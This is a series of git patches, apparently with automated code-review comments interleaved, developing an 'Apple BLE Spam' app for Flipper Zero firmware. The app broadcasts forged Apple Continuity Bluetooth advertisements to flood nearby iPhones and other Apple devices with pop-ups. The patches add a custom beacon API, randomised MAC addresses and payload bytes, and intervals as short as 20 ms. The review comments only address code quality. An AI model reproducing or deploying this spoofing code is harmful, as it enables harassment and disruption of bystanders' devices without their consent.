From b138ee1eac634fb4a1230b524d6e8e6741624c73 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Wed, 6 Sep 2023 22:18:11 +0200 Subject: [PATCH 01/10] Capital hex values --nobuild --- .../external/apple_ble_spam/lib/continuity/continuity.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 4796e1e56..995f7dcd0 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -36,8 +36,8 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { packet[i] = size - i - 1; // Packet Length i++; - packet[i++] = 0xff; // Packet Header - packet[i++] = 0x4c; // ... + packet[i++] = 0xFF; // Packet Header + packet[i++] = 0x4C; // ... packet[i++] = 0x00; // ... packet[i++] = msg->type; // Type packet[i] = size - i - 1; // Message Length From 2125f1fca48575b007b047ca7275d944d7404b75 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 00:32:02 +0200 Subject: [PATCH 02/10] New more streamlined custom ble adv api Thanks for the idea @xMasterX ! --- .../external/apple_ble_spam/apple_ble_spam.c | 46 +++++++++++++----- firmware/targets/f7/api_symbols.csv | 5 +- firmware/targets/f7/ble_glue/gap.c | 48 +++++-------------- firmware/targets/f7/ble_glue/gap.h | 2 - firmware/targets/f7/furi_hal/furi_hal_bt.c | 46 ++++++++++++++++-- .../targets/furi_hal_include/furi_hal_bt.h | 30 +++++++++++- 6 files changed, 120 insertions(+), 57 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 3b4225f60..a173aad55 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c 
@@ -355,25 +355,45 @@ static int32_t adv_thread(void* ctx) { Payload* payload = state->payload; ContinuityMsg* msg = &payload->msg; ContinuityType type = msg->type; + while(state->advertising) { if(payload->random) { size_t random_i = rand() % randoms[type].count; memcpy(&msg->data, randoms[type].datas[random_i], sizeof(msg->data)); } continuity_generate_packet(msg, state->packet); - furi_hal_bt_set_custom_adv_data(state->packet, state->size); + furi_hal_bt_custom_adv_set(state->packet, state->size); furi_thread_flags_wait(true, FuriFlagWaitAny, state->delay); } + return 0; } +static void stop_adv(State* state) { + state->advertising = false; + furi_thread_flags_set(furi_thread_get_id(state->thread), true); + furi_thread_join(state->thread); + furi_hal_bt_custom_adv_stop(); +} + +static void start_adv(State* state) { + state->advertising = true; + furi_thread_start(state->thread); + uint8_t mac[GAP_MAC_ADDR_SIZE] = { + rand() % 256, + rand() % 256, + rand() % 256, + rand() % 256, + rand() % 256, + rand() % 256, + }; + furi_hal_bt_custom_adv_start(state->delay, state->delay, 0x00, mac, 0x1F); +} + static void toggle_adv(State* state, Payload* payload) { if(state->advertising) { - state->advertising = false; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); - furi_thread_join(state->thread); + stop_adv(state); state->payload = NULL; - furi_hal_bt_set_custom_adv_data(NULL, 0); free(state->packet); state->packet = NULL; state->size = 0; @@ -381,8 +401,7 @@ static void toggle_adv(State* state, Payload* payload) { state->size = continuity_get_packet_size(payload->msg.type); state->packet = malloc(state->size); state->payload = payload; - state->advertising = true; - furi_thread_start(state->thread); + start_adv(state); } } 
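Review bot: The new `furi_hal_bt_custom_adv_set`, `furi_hal_bt_custom_adv_start` and `furi_hal_bt_custom_adv_stop` all return `bool`, but `adv_thread`, `start_adv` and `stop_adv` discard the result. If `furi_hal_bt_custom_adv_start` fails, `state->advertising` stays true and the worker thread keeps running. `start_adv` also starts the thread before the beacon, so the first `furi_hal_bt_custom_adv_set` can run before `furi_hal_bt_custom_adv_start`; whether the controller accepts that order is not visible in this patch. I would start the beacon first and unwind on failure, e.g. `if(!furi_hal_bt_custom_adv_start(state->delay, state->delay, 0x00, mac, 0x1F)) { state->advertising = false; return; }` ahead of `furi_thread_start(state->thread);`.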
@@ -464,36 +483,39 @@ int32_t apple_ble_spam(void* p) { furi_check(furi_message_queue_get(input_queue, &input, FuriWaitForever) == FuriStatusOk); Payload* payload = &payloads[state->index]; + bool advertising = state->advertising; switch(input.key) { case InputKeyOk: toggle_adv(state, payload); break; case InputKeyUp: if(state->delay < 5000) { + if(advertising) stop_adv(state); state->delay += 100; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); + if(advertising) start_adv(state); } break; case InputKeyDown: if(state->delay > 100) { + if(advertising) stop_adv(state); state->delay -= 100; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); + if(advertising) start_adv(state); } break; case InputKeyLeft: if(state->index > 0) { - if(state->advertising) toggle_adv(state, payload); + if(advertising) toggle_adv(state, payload); state->index--; } break; case InputKeyRight: if(state->index < COUNT_OF(payloads) - 1) { - if(state->advertising) toggle_adv(state, payload); + if(advertising) toggle_adv(state, payload); state->index++; } break; case InputKeyBack: - if(state->advertising) toggle_adv(state, payload); + if(advertising) toggle_adv(state, payload); running = false; break; default: diff --git a/firmware/targets/f7/api_symbols.csv b/firmware/targets/f7/api_symbols.csv index e9b53e916..4f29e357e 100644 --- a/firmware/targets/f7/api_symbols.csv +++ b/firmware/targets/f7/api_symbols.csv 
@@ -1075,6 +1075,9 @@ Function,+,furi_event_flag_wait,uint32_t,"FuriEventFlag*, uint32_t, uint32_t, ui Function,+,furi_get_tick,uint32_t, Function,+,furi_hal_bt_change_app,_Bool,"FuriHalBtProfile, GapEventCallback, void*" Function,+,furi_hal_bt_clear_white_list,_Bool, +Function,+,furi_hal_bt_custom_adv_set,_Bool,"const uint8_t*, size_t" +Function,+,furi_hal_bt_custom_adv_start,_Bool,"uint16_t, uint16_t, uint8_t, const uint8_t[( 6 )], uint8_t" +Function,+,furi_hal_bt_custom_adv_stop,_Bool, Function,+,furi_hal_bt_dump_state,void,FuriString* Function,+,furi_hal_bt_ensure_c2_mode,_Bool,BleGlueC2Mode Function,-,furi_hal_bt_get_conn_rssi,uint32_t,uint8_t* @@ -1117,7 +1120,6 @@ Function,+,furi_hal_bt_serial_set_rpc_status,void,FuriHalBtSerialRpcStatus Function,+,furi_hal_bt_serial_start,void, Function,+,furi_hal_bt_serial_stop,void, Function,+,furi_hal_bt_serial_tx,_Bool,"uint8_t*, uint16_t" -Function,+,furi_hal_bt_set_custom_adv_data,void,"const uint8_t*, size_t" Function,+,furi_hal_bt_set_key_storage_change_callback,void,"BleGlueKeyStorageChangedCallback, void*" Function,+,furi_hal_bt_set_profile_adv_name,void,"FuriHalBtProfile, const char[( 18 + 1 )]" Function,+,furi_hal_bt_set_profile_mac_addr,void,"FuriHalBtProfile, const uint8_t[( 6 )]" @@ -1705,7 +1707,6 @@ Function,-,gammaf_r,float,"float, int*" Function,-,gap_get_remote_conn_rssi,uint32_t,int8_t* Function,-,gap_get_state,GapState, Function,-,gap_init,_Bool,"GapConfig*, GapEventCallback, void*" -Function,-,gap_set_custom_adv_data,void,"size_t, const uint8_t*" Function,-,gap_start_advertising,void, Function,-,gap_stop_advertising,void, Function,-,gap_thread_stop,void, diff --git a/firmware/targets/f7/ble_glue/gap.c b/firmware/targets/f7/ble_glue/gap.c index 38e5520ab..27ab1ee40 100644 --- a/firmware/targets/f7/ble_glue/gap.c +++ b/firmware/targets/f7/ble_glue/gap.c 
@@ -37,9 +37,6 @@ typedef struct { FuriThread* thread; FuriMessageQueue* command_queue; bool enable_adv; - - size_t custom_adv_len; - const uint8_t* custom_adv_data; } Gap; typedef enum { @@ -434,34 +431,18 @@ static void gap_advertise_start(GapState new_state) { } } // Configure advertising - if(gap->custom_adv_data) { - // Custom adv logic from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ - static const uint16_t gap_appearance = 0x0000; //GAP_APPEARANCE_UNKNOWN - status = aci_gatt_update_char_value( - gap->service.gap_svc_handle, - gap->service.gap_svc_handle, - 0, - sizeof(gap_appearance), - (uint8_t*)&gap_appearance); - status = aci_gap_set_discoverable( - ADV_IND, min_interval, max_interval, CFG_IDENTITY_ADDRESS, 0, 0, NULL, 0, NULL, 0, 0); - status = aci_gap_delete_ad_type(AD_TYPE_FLAGS); - status = aci_gap_delete_ad_type(AD_TYPE_TX_POWER_LEVEL); - status = aci_gap_update_adv_data(gap->custom_adv_len, gap->custom_adv_data); - } else { - status = aci_gap_set_discoverable( - ADV_IND, - min_interval, - max_interval, - CFG_IDENTITY_ADDRESS, - 0, - strlen(gap->service.adv_name), - (uint8_t*)gap->service.adv_name, - gap->service.adv_svc_uuid_len, - gap->service.adv_svc_uuid, - 0, - 0); - } + status = aci_gap_set_discoverable( + ADV_IND, + min_interval, + max_interval, + CFG_IDENTITY_ADDRESS, + 0, + strlen(gap->service.adv_name), + (uint8_t*)gap->service.adv_name, + gap->service.adv_svc_uuid_len, + gap->service.adv_svc_uuid, + 0, + 0); if(status) { FURI_LOG_E(TAG, "set_discoverable failed %d", status); } else { @@ -581,11 +562,6 @@ uint32_t gap_get_remote_conn_rssi(int8_t* rssi) { return 0; } -void gap_set_custom_adv_data(size_t adv_len, const uint8_t* adv_data) { - gap->custom_adv_len = adv_len; - gap->custom_adv_data = adv_data; -} - GapState gap_get_state() { GapState state; if(gap) { diff --git a/firmware/targets/f7/ble_glue/gap.h b/firmware/targets/f7/ble_glue/gap.h index 721b4c778..7b317e06c 100644 --- a/firmware/targets/f7/ble_glue/gap.h 
+++ b/firmware/targets/f7/ble_glue/gap.h @@ -83,8 +83,6 @@ void gap_thread_stop(); uint32_t gap_get_remote_conn_rssi(int8_t* rssi); -void gap_set_custom_adv_data(size_t adv_len, const uint8_t* adv_data); - #ifdef __cplusplus } #endif diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt.c b/firmware/targets/f7/furi_hal/furi_hal_bt.c index 83505fdb5..6a27b86e3 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_bt.c +++ b/firmware/targets/f7/furi_hal/furi_hal_bt.c @@ -483,10 +483,48 @@ uint32_t furi_hal_bt_get_conn_rssi(uint8_t* rssi) { return since; } -void furi_hal_bt_set_custom_adv_data(const uint8_t* adv_data, size_t adv_len) { - gap_set_custom_adv_data(adv_len, adv_data); - furi_hal_bt_stop_advertising(); - furi_hal_bt_start_advertising(); +bool furi_hal_bt_custom_adv_set(const uint8_t* adv_data, size_t adv_len) { + tBleStatus status = aci_gap_additional_beacon_set_data(adv_len, adv_data); + if(status) { + FURI_LOG_E(TAG, "custom_adv_set failed %d", status); + return false; + } else { + FURI_LOG_I(TAG, "custom_adv_set success"); + return true; + } +} + +bool furi_hal_bt_custom_adv_start( + uint16_t min_interval, + uint16_t max_interval, + uint8_t mac_type, + const uint8_t mac_addr[GAP_MAC_ADDR_SIZE], + uint8_t power_amp_level) { + tBleStatus status = aci_gap_additional_beacon_start( + min_interval / 0.625, // Millis to gap time + max_interval / 0.625, // Millis to gap time + 0b00000111, // All 3 channels + mac_type, + mac_addr, + power_amp_level); + if(status) { + FURI_LOG_E(TAG, "custom_adv_start failed %d", status); + return false; + } else { + FURI_LOG_I(TAG, "custom_adv_start success"); + return true; + } +} + +bool furi_hal_bt_custom_adv_stop() { + tBleStatus status = aci_gap_additional_beacon_stop(); + if(status) { + FURI_LOG_E(TAG, "custom_adv_stop failed %d", status); + return false; + } else { + FURI_LOG_I(TAG, "custom_adv_stop success"); + return true; + } } void furi_hal_bt_reverse_mac_addr(uint8_t mac_addr[GAP_MAC_ADDR_SIZE]) { 
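Review bot: `furi_hal_bt_custom_adv_start` converts milliseconds with `min_interval / 0.625` and passes the resulting `double` to the controller call without any range check. A `uint16_t` input above roughly 40959 produces a value that no longer fits a 16-bit interval (assuming the ACI parameter is 16 bits wide), and out-of-range floating-to-integer conversion is undefined behaviour. Since this becomes an exported HAL entry point, I would reject bad input up front with `if(min_interval < 20 || max_interval > 10240 || min_interval > max_interval || power_amp_level > 0x1F) return false;` and convert in integer arithmetic with `(uint32_t)min_interval * 8 / 5`. In `furi_hal_bt_custom_adv_set`, `adv_len` is a `size_t` handed straight to the ACI call, so a length check before the call avoids silent narrowing. The `FURI_LOG_I` on success fires on every packet update from the caller's loop and would be quieter at debug level.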
diff --git a/firmware/targets/furi_hal_include/furi_hal_bt.h b/firmware/targets/furi_hal_include/furi_hal_bt.h index ed7519b39..b7d4eae1a 100644 --- a/firmware/targets/furi_hal_include/furi_hal_bt.h +++ b/firmware/targets/furi_hal_include/furi_hal_bt.h @@ -251,7 +251,35 @@ const uint8_t* furi_hal_bt_get_profile_mac_addr(FuriHalBtProfile profile); uint32_t furi_hal_bt_get_conn_rssi(uint8_t* rssi); -void furi_hal_bt_set_custom_adv_data(const uint8_t* adv_data, size_t adv_len); +/** Set custom advertisement packet data + * @param[in] adv_data pointer to advertisement data + * @param[in] adv_len length of advertisement data + * + * @return true on success +*/ +bool furi_hal_bt_custom_adv_set(const uint8_t* adv_data, size_t adv_len); + +/** Start custom advertisement beacon + * @param[in] min_interval minimum advertisement interval (20 - 10240 ms) + * @param[in] max_interval maximum advertisement interval (20 - 10240 ms) + * @param[in] mac_type type of mac address (0x00 public, 0x01 static random) + * @param[in] mac_addr pointer to mac address + * @param[in] power_amp_level amplifier level (output dBm) (0x00 - 0x1F) + * + * @return true on success +*/ +bool furi_hal_bt_custom_adv_start( + uint16_t min_interval, + uint16_t max_interval, + uint8_t mac_type, + const uint8_t mac_addr[GAP_MAC_ADDR_SIZE], + uint8_t power_amp_level); + +/** Stop custom advertisement beacon + * + * @return true on success +*/ +bool furi_hal_bt_custom_adv_stop(); void furi_hal_bt_set_profile_pairing_method(FuriHalBtProfile profile, GapPairing pairing_method); From 2a3318c6275c813fc91c78e2904cd105ba1c0361 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 00:35:08 +0200 Subject: [PATCH 03/10] Preset values for delays, now minimum is 20ms --- .../external/apple_ble_spam/apple_ble_spam.c | 35 ++++++++++++++----- 1 file changed, 27 insertions(+), 8 deletions(-) 
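Review bot: The doc comments for `furi_hal_bt_custom_adv_set` and `furi_hal_bt_custom_adv_start` omit what a caller needs to use them safely: whether `adv_data` is copied or must stay valid, the maximum `adv_len`, and what happens when an interval outside the stated 20 - 10240 ms range is passed. The implementation in this patch does not reject out-of-range values, so I would either validate and document `@return false if a parameter is out of range`, or at least add `@warning parameters are passed to the controller unvalidated`. It is also worth stating how these calls interact with the regular profile advertising started by `furi_hal_bt_start_advertising`. `bool furi_hal_bt_custom_adv_stop();` reads better as `bool furi_hal_bt_custom_adv_stop(void);` in a C header.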
diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index a173aad55..f1fcb2f64 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -340,6 +340,25 @@ struct { ContinuityData** datas; } randoms[ContinuityTypeCount] = {0}; +size_t delays[] = { + 20, + 50, + 100, + 150, + 200, + 300, + 400, + 500, + 750, + 1000, + 1500, + 2000, + 2500, + 3000, + 4000, + 5000, +}; + typedef struct { bool advertising; size_t delay; @@ -363,7 +382,7 @@ static int32_t adv_thread(void* ctx) { } continuity_generate_packet(msg, state->packet); furi_hal_bt_custom_adv_set(state->packet, state->size); - furi_thread_flags_wait(true, FuriFlagWaitAny, state->delay); + furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]); } return 0; @@ -387,7 +406,8 @@ static void start_adv(State* state) { rand() % 256, rand() % 256, }; - furi_hal_bt_custom_adv_start(state->delay, state->delay, 0x00, mac, 0x1F); + size_t delay = delays[state->delay]; + furi_hal_bt_custom_adv_start(delay, delay, 0x00, mac, 0x1F); } static void toggle_adv(State* state, Payload* payload) { @@ -414,7 +434,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { canvas_draw_str(canvas, 14, 12, "Apple BLE Spam"); canvas_set_font(canvas, FontBatteryPercent); char delay[14]; - snprintf(delay, sizeof(delay), "%ims", state->delay); + snprintf(delay, sizeof(delay), "%ims", delays[state->delay]); canvas_draw_str_aligned(canvas, 116, 12, AlignRight, AlignBottom, delay); canvas_draw_icon(canvas, 119, 6, &I_SmallArrowUp_3x5); canvas_draw_icon(canvas, 119, 10, &I_SmallArrowDown_3x5); @@ -464,7 +484,6 @@ int32_t apple_ble_spam(void* p) { } State* state = malloc(sizeof(State)); - state->delay = 500; state->thread = furi_thread_alloc(); furi_thread_set_callback(state->thread, adv_thread); furi_thread_set_context(state->thread, state); 
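Review bot: `size_t delays[]` is defined as a writable global with external linkage although it is a fixed lookup table used only in this file. `static const size_t delays[] = {` keeps it out of the global namespace and lets it live in read-only memory. In the `draw_callback` hunk the element is printed with `"%ims"`, which does not match a `size_t` argument; `"%zums"` or an explicit cast to `int` matches it for as long as the table keeps this element type.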
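Review bot: Removing `state->delay = 500;` in the `apple_ble_spam` hunk leaves `state->delay` unset, and it is now used as an index into `delays[]`. `State` comes from `malloc(sizeof(State))`, so the index is only valid if the platform allocator zero-fills, which this patch does not show; otherwise `delays[state->delay]` reads out of bounds. Relying on zero-fill would also silently move the default from 500 ms to the first table entry. I would keep an explicit initialiser naming the intended preset, e.g. `state->delay = 0; // index into delays[]`. The function body continues outside the hunk.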
@@ -489,16 +508,16 @@ int32_t apple_ble_spam(void* p) { toggle_adv(state, payload); break; case InputKeyUp: - if(state->delay < 5000) { + if(state->delay < COUNT_OF(delays) - 1) { if(advertising) stop_adv(state); - state->delay += 100; + state->delay++; if(advertising) start_adv(state); } break; case InputKeyDown: - if(state->delay > 100) { + if(state->delay > 0) { if(advertising) stop_adv(state); - state->delay -= 100; + state->delay--; if(advertising) start_adv(state); } break; From 45a0d5d1be69ecec693ad101179d91a482d0e309 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 00:37:15 +0200 Subject: [PATCH 04/10] Remember bt state after ble stop (#380) --- applications/external/apple_ble_spam/apple_ble_spam.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index f1fcb2f64..83af0846f 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -360,6 +360,7 @@ size_t delays[] = { }; typedef struct { + bool resume; bool advertising; size_t delay; size_t size; @@ -413,6 +414,7 @@ static void start_adv(State* state) { static void toggle_adv(State* state, Payload* payload) { if(state->advertising) { stop_adv(state); + if(state->resume) furi_hal_bt_start_advertising(); state->payload = NULL; free(state->packet); state->packet = NULL; @@ -421,6 +423,8 @@ static void toggle_adv(State* state, Payload* payload) { state->size = continuity_get_packet_size(payload->msg.type); state->packet = malloc(state->size); state->payload = payload; + state->resume = furi_hal_bt_is_active(); + furi_hal_bt_stop_advertising(); start_adv(state); } } From e737ebb3f630ac26bc7ba13b12664c40f9568b5b Mon Sep 17 00:00:00 2001 
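Review bot: `bool resume;` is added to `State` without a comment, and its meaning only becomes clear from reading `toggle_adv`. I would document it at the field, e.g. `bool resume; // regular BT advertising was active before the beacon started; restart it on stop`. The flag is sampled with `furi_hal_bt_is_active()` and followed by an unconditional `furi_hal_bt_stop_advertising()`. If "active" also covers an established connection (not visible in this patch), this path would interrupt it and the later `furi_hal_bt_start_advertising()` would not restore it, which is worth noting in the comment or guarding against. `toggle_adv` begins before these hunks.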
From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 01:51:00 +0200 Subject: [PATCH 05/10] Rework random mac handling --- .../external/apple_ble_spam/apple_ble_spam.c | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 83af0846f..d37d895a6 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -1,6 +1,7 @@ #include #include #include +#include #include #include "apple_ble_spam_icons.h" @@ -367,6 +368,7 @@ typedef struct { uint8_t* packet; Payload* payload; FuriThread* thread; + uint8_t mac[GAP_MAC_ADDR_SIZE]; size_t index; } State; @@ -399,16 +401,8 @@ static void stop_adv(State* state) { static void start_adv(State* state) { state->advertising = true; furi_thread_start(state->thread); - uint8_t mac[GAP_MAC_ADDR_SIZE] = { - rand() % 256, - rand() % 256, - rand() % 256, - rand() % 256, - rand() % 256, - rand() % 256, - }; size_t delay = delays[state->delay]; - furi_hal_bt_custom_adv_start(delay, delay, 0x00, mac, 0x1F); + furi_hal_bt_custom_adv_start(delay, delay, 0x00, state->mac, 0x1F); } static void toggle_adv(State* state, Payload* payload) { @@ -423,6 +417,7 @@ static void toggle_adv(State* state, Payload* payload) { state->size = continuity_get_packet_size(payload->msg.type); state->packet = malloc(state->size); state->payload = payload; + furi_hal_random_fill_buf(state->mac, sizeof(state->mac)); state->resume = furi_hal_bt_is_active(); furi_hal_bt_stop_advertising(); start_adv(state); From d6d66e0d4218717a6b33c481fb2d64918ff9d497 Mon Sep 17 00:00:00 2001 
From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 01:53:38 +0200 Subject: [PATCH 06/10] Replace size_t with appropriately sized integers --- .../external/apple_ble_spam/apple_ble_spam.c | 20 +++++++++---------- .../lib/continuity/continuity.c | 8 ++++---- .../lib/continuity/continuity.h | 2 +- 3 files changed, 15 insertions(+), 15 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index d37d895a6..73c80a247 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -337,11 +337,11 @@ static Payload payloads[] = { }; struct { - size_t count; + uint8_t count; ContinuityData** datas; } randoms[ContinuityTypeCount] = {0}; -size_t delays[] = { +uint16_t delays[] = { 20, 50, 100, @@ -363,13 +363,13 @@ size_t delays[] = { typedef struct { bool resume; bool advertising; - size_t delay; - size_t size; + uint8_t delay; + uint8_t size; uint8_t* packet; Payload* payload; FuriThread* thread; uint8_t mac[GAP_MAC_ADDR_SIZE]; - size_t index; + uint8_t index; } State; static int32_t adv_thread(void* ctx) { @@ -380,7 +380,7 @@ static int32_t adv_thread(void* ctx) { while(state->advertising) { if(payload->random) { - size_t random_i = rand() % randoms[type].count; + uint8_t random_i = rand() % randoms[type].count; memcpy(&msg->data, randoms[type].datas[random_i], sizeof(msg->data)); } continuity_generate_packet(msg, state->packet); @@ -401,7 +401,7 @@ static void stop_adv(State* state) { static void start_adv(State* state) { state->advertising = true; furi_thread_start(state->thread); - size_t delay = delays[state->delay]; + uint16_t delay = delays[state->delay]; furi_hal_bt_custom_adv_start(delay, delay, 0x00, state->mac, 0x1F); } 
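Review bot: The switch to `uint8_t` for `randoms[].count`, `State.index`, and (in the later `apple_ble_spam` hunk of this patch) `payload_i` and `random_i` has no compile-time bound behind it. These values are compared against `COUNT_OF(payloads)`, so once the table grows past 255 entries `payload_i < COUNT_OF(payloads)` can never become false and `count` wraps. Pin the assumption next to the table with `_Static_assert(COUNT_OF(payloads) <= UINT8_MAX, "payload indices are uint8_t");`. The same applies to `State.size` and `continuity_get_packet_size`, where the narrowing is only safe while every entry of `continuity_packet_sizes` stays within one byte.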
@@ -466,15 +466,15 @@ static void input_callback(InputEvent* input, void* ctx) { int32_t apple_ble_spam(void* p) { UNUSED(p); - for(size_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { + for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { if(payloads[payload_i].random) continue; randoms[payloads[payload_i].msg.type].count++; } for(ContinuityType type = 0; type < ContinuityTypeCount; type++) { if(!randoms[type].count) continue; randoms[type].datas = malloc(sizeof(ContinuityData*) * randoms[type].count); - size_t random_i = 0; - for(size_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { + uint8_t random_i = 0; + for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { if(payloads[payload_i].random) continue; if(payloads[payload_i].msg.type == type) { randoms[type].datas[random_i++] = &payloads[payload_i].msg.data; diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 995f7dcd0..631de4e3f 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -18,7 +18,7 @@ const char* continuity_get_type_name(ContinuityType type) { return continuity_type_names[type]; } -static size_t continuity_packet_sizes[ContinuityTypeCount] = { +static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { [ContinuityTypeAirDrop] = 24, [ContinuityTypeProximityPair] = 31, [ContinuityTypeAirplayTarget] = 12, 
@@ -26,13 +26,13 @@ static size_t continuity_packet_sizes[ContinuityTypeCount] = { [ContinuityTypeTetheringSource] = 12, [ContinuityTypeNearbyAction] = 11, }; -size_t continuity_get_packet_size(ContinuityType type) { +uint8_t continuity_get_packet_size(ContinuityType type) { return continuity_packet_sizes[type]; } void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { - size_t size = continuity_get_packet_size(msg->type); - size_t i = 0; + uint8_t size = continuity_get_packet_size(msg->type); + uint8_t i = 0; packet[i] = size - i - 1; // Packet Length i++; diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index 773f88d9e..e1789f16f 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -44,6 +44,6 @@ typedef struct { const char* continuity_get_type_name(ContinuityType type); -size_t continuity_get_packet_size(ContinuityType type); +uint8_t continuity_get_packet_size(ContinuityType type); void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet); From 0d195264677c512942f12a4c3b4eaadaa1c2e268 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:02:43 +0200 Subject: [PATCH 07/10] Faster ble packet randomization --- .../lib/continuity/continuity.c | 26 ++++--------------- 1 file changed, 5 insertions(+), 21 deletions(-) diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 631de4e3f..99513f379 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c 
@@ -34,8 +34,7 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { uint8_t size = continuity_get_packet_size(msg->type); uint8_t i = 0; - packet[i] = size - i - 1; // Packet Length - i++; + packet[i++] = size - 1; // Packet Length packet[i++] = 0xFF; // Packet Header packet[i++] = 0x4C; // ... packet[i++] = 0x00; // ... @@ -75,22 +74,8 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { packet[i++] = (rand() % 256); // Lid Open Counter packet[i++] = 0x00; // Device Color packet[i++] = 0x00; - packet[i++] = (rand() % 256); // Encrypted Payload - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... + furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload + i += 16; break; case ContinuityTypeAirplayTarget: @@ -133,9 +118,8 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { if(packet[i] == 0xBF && rand() % 2) packet[i]++; // Ugly hack to shift 0xBF-0xC0 for spam i++; packet[i++] = msg->data.nearby_action.type; - packet[i++] = (rand() % 256); // Authentication Tag - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; break; default: From 881f7c5e55ae31a1e90f1ef79692a4996738cef8 Mon Sep 17 00:00:00 2001 
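Review bot: `furi_hal_random_fill_buf(&packet[i], 16);` and, in the Nearby Action hunk, `furi_hal_random_fill_buf(&packet[i], 3);` write a fixed run into `packet` with no check against `size`. The function receives only a bare `uint8_t* packet`, so a mismatch between these constants and `continuity_packet_sizes` becomes a heap overflow in the caller's `malloc(state->size)` buffer. A guard before each fill makes the layout assumption explicit, e.g. `furi_assert(i + 16 <= size);` and `furi_assert(i + 3 <= size);`, ideally with the lengths as named constants. This patch adds no `#include` to continuity.c, so confirm the header declaring `furi_hal_random_fill_buf` is already reachable there. `continuity_generate_packet` starts and ends outside these hunks.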
